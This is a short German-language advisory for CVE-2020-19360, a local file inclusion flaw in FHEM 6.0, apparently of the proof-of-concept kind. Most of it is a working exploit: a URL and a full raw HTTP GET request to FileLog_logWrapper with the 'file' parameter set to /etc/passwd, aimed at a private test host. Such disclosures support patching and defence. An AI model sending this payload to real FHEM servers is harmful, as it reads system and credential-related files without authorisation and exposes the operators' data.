
Local File Inclusion (LFI) in FHEM 6.0 ermöglicht einem Angreifer das Einbinden einer Datei, was zur Offenlegung sensibler Informationen führen kann.
LFI in FHEM 6.0 ermöglicht es einem Angreifer, eine Datei einzubinden, was zur Offenlegung sensibler Informationen führen kann.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-19360
Um die Schwachstelle auszunutzen, könnte jemand die Anfrage 'http://[HOST]/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text' verwenden, um durch Ändern des Parameters "file" einige Informationen vom Ziel zu erhalten.
GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1
Host: 172.16.155.129:8083
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

